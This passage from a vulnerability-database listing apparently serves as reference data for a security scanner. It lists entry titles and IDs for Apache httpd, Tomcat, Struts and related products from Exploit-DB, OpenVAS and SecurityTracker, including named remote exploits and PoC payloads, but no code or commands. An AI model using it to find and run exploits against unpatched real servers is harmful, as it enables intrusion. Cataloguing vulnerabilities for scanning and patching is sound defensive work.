15398| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15399| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
15400| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
15401| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
15402| [12330] Apache OFBiz - Multiple XSS
15403| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
15404| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
15405| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
15406| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
15407| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
15408| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
15409| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
15410| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15411| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15412| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
15413| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
15414| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
15415| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15416| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
15417| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
15418| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
15419| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
15420| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
15421| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
15422| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
15423| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
15424| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
15425| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
15426| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
15427| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
15428| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
15429| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
15430| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
15431| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
15432| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
15433| [466] htpasswd Apache 1.3.31 - Local Exploit
15434| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
15435| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
15436| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
15437| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
15438| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
15439| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
15440| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
15441| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
15442| [9] Apache HTTP Server 2.x Memory Leak Exploit
15443|
15444| OpenVAS (Nessus) - http://www.openvas.org:
15445| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
15446| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
15447| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15448| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
15449| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
15450| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15451| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15452| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
15453| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
15454| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
15455| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
15456| [900571] Apache APR-Utils Version Detection
15457| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
15458| [900496] Apache Tiles Multiple XSS Vulnerability
15459| [900493] Apache Tiles Version Detection
15460| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
15461| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
15462| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
15463| [870175] RedHat Update for apache RHSA-2008:0004-01
15464| [864591] Fedora Update for apache-poi FEDORA-2012-10835
15465| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
15466| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
15467| [864250] Fedora Update for apache-poi FEDORA-2012-7683
15468| [864249] Fedora Update for apache-poi FEDORA-2012-7686
15469| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
15470| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
15471| [855821] Solaris Update for Apache 1.3 122912-19
15472| [855812] Solaris Update for Apache 1.3 122911-19
15473| [855737] Solaris Update for Apache 1.3 122911-17
15474| [855731] Solaris Update for Apache 1.3 122912-17
15475| [855695] Solaris Update for Apache 1.3 122911-16
15476| [855645] Solaris Update for Apache 1.3 122912-16
15477| [855587] Solaris Update for kernel update and Apache 108529-29
15478| [855566] Solaris Update for Apache 116973-07
15479| [855531] Solaris Update for Apache 116974-07
15480| [855524] Solaris Update for Apache 2 120544-14
15481| [855494] Solaris Update for Apache 1.3 122911-15
15482| [855478] Solaris Update for Apache Security 114145-11
15483| [855472] Solaris Update for Apache Security 113146-12
15484| [855179] Solaris Update for Apache 1.3 122912-15
15485| [855147] Solaris Update for kernel update and Apache 108528-29
15486| [855077] Solaris Update for Apache 2 120543-14
15487| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
15488| [850088] SuSE Update for apache2 SUSE-SA:2007:061
15489| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
15490| [841209] Ubuntu Update for apache2 USN-1627-1
15491| [840900] Ubuntu Update for apache2 USN-1368-1
15492| [840798] Ubuntu Update for apache2 USN-1259-1
15493| [840734] Ubuntu Update for apache2 USN-1199-1
15494| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
15495| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
15496| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
15497| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
15498| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
15499| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
15500| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
15501| [835253] HP-UX Update for Apache Web Server HPSBUX02645
15502| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
15503| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
15504| [835236] HP-UX Update for Apache with PHP HPSBUX02543
15505| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
15506| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
15507| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
15508| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
15509| [835188] HP-UX Update for Apache HPSBUX02308
15510| [835181] HP-UX Update for Apache With PHP HPSBUX02332
15511| [835180] HP-UX Update for Apache with PHP HPSBUX02342
15512| [835172] HP-UX Update for Apache HPSBUX02365
15513| [835168] HP-UX Update for Apache HPSBUX02313
15514| [835148] HP-UX Update for Apache HPSBUX01064
15515| [835139] HP-UX Update for Apache with PHP HPSBUX01090
15516| [835131] HP-UX Update for Apache HPSBUX00256
15517| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
15518| [835104] HP-UX Update for Apache HPSBUX00224
15519| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
15520| [835101] HP-UX Update for Apache HPSBUX01232
15521| [835080] HP-UX Update for Apache HPSBUX02273
15522| [835078] HP-UX Update for ApacheStrong HPSBUX00255
15523| [835044] HP-UX Update for Apache HPSBUX01019
15524| [835040] HP-UX Update for Apache PHP HPSBUX00207
15525| [835025] HP-UX Update for Apache HPSBUX00197
15526| [835023] HP-UX Update for Apache HPSBUX01022
15527| [835022] HP-UX Update for Apache HPSBUX02292
15528| [835005] HP-UX Update for Apache HPSBUX02262
15529| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
15530| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
15531| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
15532| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
15533| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
15534| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
15535| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
15536| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
15537| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
15538| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
15539| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
15540| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
15541| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
15542| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
15543| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
15544| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
15545| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
15546| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
15547| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
15548| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
15549| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
15550| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
15551| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
15552| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
15553| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
15554| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
15555| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
15556| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
15557| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
15558| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
15559| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15560| [801942] Apache Archiva Multiple Vulnerabilities
15561| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
15562| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
15563| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
15564| [801284] Apache Derby Information Disclosure Vulnerability
15565| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
15566| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
15567| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
15568| [800680] Apache APR Version Detection
15569| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15570| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15571| [800677] Apache Roller Version Detection
15572| [800279] Apache mod_jk Module Version Detection
15573| [800278] Apache Struts Cross Site Scripting Vulnerability
15574| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
15575| [800276] Apache Struts Version Detection
15576| [800271] Apache Struts Directory Traversal Vulnerability
15577| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
15578| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15579| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15580| [103122] Apache Web Server ETag Header Information Disclosure Weakness
15581| [103074] Apache Continuum Cross Site Scripting Vulnerability
15582| [103073] Apache Continuum Detection
15583| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15584| [101023] Apache Open For Business Weak Password security check
15585| [101020] Apache Open For Business HTML injection vulnerability
15586| [101019] Apache Open For Business service detection
15587| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
15588| [100923] Apache Archiva Detection
15589| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15590| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15591| [100813] Apache Axis2 Detection
15592| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15593| [100795] Apache Derby Detection
15594| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
15595| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15596| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15597| [100514] Apache Multiple Security Vulnerabilities
15598| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15599| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15600| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15601| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15602| [72626] Debian Security Advisory DSA 2579-1 (apache2)
15603| [72612] FreeBSD Ports: apache22
15604| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
15605| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
15606| [71512] FreeBSD Ports: apache
15607| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
15608| [71256] Debian Security Advisory DSA 2452-1 (apache2)
15609| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
15610| [70737] FreeBSD Ports: apache
15611| [70724] Debian Security Advisory DSA 2405-1 (apache2)
15612| [70600] FreeBSD Ports: apache
15613| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
15614| [70235] Debian Security Advisory DSA 2298-2 (apache2)
15615| [70233] Debian Security Advisory DSA 2298-1 (apache2)
15616| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
15617| [69338] Debian Security Advisory DSA 2202-1 (apache2)
15618| [67868] FreeBSD Ports: apache
15619| [66816] FreeBSD Ports: apache
15620| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
15621| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
15622| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
15623| [66081] SLES11: Security update for Apache 2
15624| [66074] SLES10: Security update for Apache 2
15625| [66070] SLES9: Security update for Apache 2
15626| [65998] SLES10: Security update for apache2-mod_python
15627| [65893] SLES10: Security update for Apache 2
15628| [65888] SLES10: Security update for Apache 2
15629| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
15630| [65510] SLES9: Security update for Apache 2
15631| [65472] SLES9: Security update for Apache
15632| [65467] SLES9: Security update for Apache
15633| [65450] SLES9: Security update for apache2
15634| [65390] SLES9: Security update for Apache2
15635| [65363] SLES9: Security update for Apache2
15636| [65309] SLES9: Security update for Apache and mod_ssl
15637| [65296] SLES9: Security update for webdav apache module
15638| [65283] SLES9: Security update for Apache2
15639| [65249] SLES9: Security update for Apache 2
15640| [65230] SLES9: Security update for Apache 2
15641| [65228] SLES9: Security update for Apache 2
15642| [65212] SLES9: Security update for apache2-mod_python
15643| [65209] SLES9: Security update for apache2-worker
15644| [65207] SLES9: Security update for Apache 2
15645| [65168] SLES9: Security update for apache2-mod_python
15646| [65142] SLES9: Security update for Apache2
15647| [65136] SLES9: Security update for Apache 2
15648| [65132] SLES9: Security update for apache
15649| [65131] SLES9: Security update for Apache 2 oes/CORE
15650| [65113] SLES9: Security update for apache2
15651| [65072] SLES9: Security update for apache and mod_ssl
15652| [65017] SLES9: Security update for Apache 2
15653| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
15654| [64783] FreeBSD Ports: apache
15655| [64774] Ubuntu USN-802-2 (apache2)
15656| [64653] Ubuntu USN-813-2 (apache2)
15657| [64559] Debian Security Advisory DSA 1834-2 (apache2)
15658| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
15659| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
15660| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
15661| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
15662| [64443] Ubuntu USN-802-1 (apache2)
15663| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
15664| [64423] Debian Security Advisory DSA 1834-1 (apache2)
15665| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
15666| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
15667| [64251] Debian Security Advisory DSA 1816-1 (apache2)
15668| [64201] Ubuntu USN-787-1 (apache2)
15669| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
15670| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
15671| [63565] FreeBSD Ports: apache
15672| [63562] Ubuntu USN-731-1 (apache2)
15673| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
15674| [61185] FreeBSD Ports: apache
15675| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
15676| [60387] Slackware Advisory SSA:2008-045-02 apache
15677| [58826] FreeBSD Ports: apache-tomcat
15678| [58825] FreeBSD Ports: apache-tomcat
15679| [58804] FreeBSD Ports: apache
15680| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
15681| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
15682| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
15683| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
15684| [57335] Debian Security Advisory DSA 1167-1 (apache)
15685| [57201] Debian Security Advisory DSA 1131-1 (apache)
15686| [57200] Debian Security Advisory DSA 1132-1 (apache2)
15687| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
15688| [57145] FreeBSD Ports: apache
15689| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15690| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15691| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15692| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15693| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15694| [56067] FreeBSD Ports: apache
15695| [55803] Slackware Advisory SSA:2005-310-04 apache
15696| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15697| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15698| [55355] FreeBSD Ports: apache
15699| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15700| [55261] Debian Security Advisory DSA 805-1 (apache2)
15701| [55259] Debian Security Advisory DSA 803-1 (apache)
15702| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15703| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15704| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15705| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15706| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15707| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15708| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15709| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15710| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15711| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15712| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15713| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15714| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15715| [54439] FreeBSD Ports: apache
15716| [53931] Slackware Advisory SSA:2004-133-01 apache
15717| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15718| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15719| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15720| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15721| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15722| [53848] Debian Security Advisory DSA 131-1 (apache)
15723| [53784] Debian Security Advisory DSA 021-1 (apache)
15724| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15725| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15726| [53735] Debian Security Advisory DSA 187-1 (apache)
15727| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15728| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15729| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15730| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15731| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15732| [53282] Debian Security Advisory DSA 594-1 (apache)
15733| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15734| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15735| [53215] Debian Security Advisory DSA 525-1 (apache)
15736| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15737| [52529] FreeBSD Ports: apache+ssl
15738| [52501] FreeBSD Ports: apache
15739| [52461] FreeBSD Ports: apache
15740| [52390] FreeBSD Ports: apache
15741| [52389] FreeBSD Ports: apache
15742| [52388] FreeBSD Ports: apache
15743| [52383] FreeBSD Ports: apache
15744| [52339] FreeBSD Ports: apache+mod_ssl
15745| [52331] FreeBSD Ports: apache
15746| [52329] FreeBSD Ports: ru-apache+mod_ssl
15747| [52314] FreeBSD Ports: apache
15748| [52310] FreeBSD Ports: apache
15749| [15588] Detect Apache HTTPS
15750| [15555] Apache mod_proxy content-length buffer overflow
15751| [15554] Apache mod_include priviledge escalation
15752| [14771] Apache <= 1.3.33 htpasswd local overflow
15753| [14177] Apache mod_access rule bypass
15754| [13644] Apache mod_rootme Backdoor
15755| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15756| [12280] Apache Connection Blocking Denial of Service
15757| [12239] Apache Error Log Escape Sequence Injection
15758| [12123] Apache Tomcat source.jsp malformed request information disclosure
15759| [12085] Apache Tomcat servlet/JSP container default files
15760| [11438] Apache Tomcat Directory Listing and File disclosure
15761| [11204] Apache Tomcat Default Accounts
15762| [11092] Apache 2.0.39 Win32 directory traversal
15763| [11046] Apache Tomcat TroubleShooter Servlet Installed
15764| [11042] Apache Tomcat DOS Device Name XSS
15765| [11041] Apache Tomcat /servlet Cross Site Scripting
15766| [10938] Apache Remote Command Execution via .bat files
15767| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15768| [10773] MacOS X Finder reveals contents of Apache Web files
15769| [10766] Apache UserDir Sensitive Information Disclosure
15770| [10756] MacOS X Finder reveals contents of Apache Web directories
15771| [10752] Apache Auth Module SQL Insertion Attack
15772| [10704] Apache Directory Listing
15773| [10678] Apache /server-info accessible
15774| [10677] Apache /server-status accessible
15775| [10440] Check for Apache Multiple / vulnerability
15776|
15777| SecurityTracker - https://www.securitytracker.com:
15778| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15779| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15780| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15781| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15782| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15783| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15784| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15785| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15786| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15787| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15788| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15789| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15790| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15791| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
15792| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
15793| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
15794| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
15795| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
15796| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
15797| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
15798| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
15799| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
15800| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
15801| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15802| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
15803| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15804| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15805| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
15806| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
15807| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
15808| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
15809| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
15810| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
15811| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
15812| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
15813| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
15814| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
15815| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
15816| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
15817| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
15818| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
15819| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
15820| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
15821| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
15822| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
15823| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
15824| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15825| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
15826| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
15827| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
15828| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
15829| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
15830| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
15831| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
15832| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
15833| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
15834| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
15835| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
15836| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
15837| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
15838| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
15839| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
15840| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
15841| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
15842| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
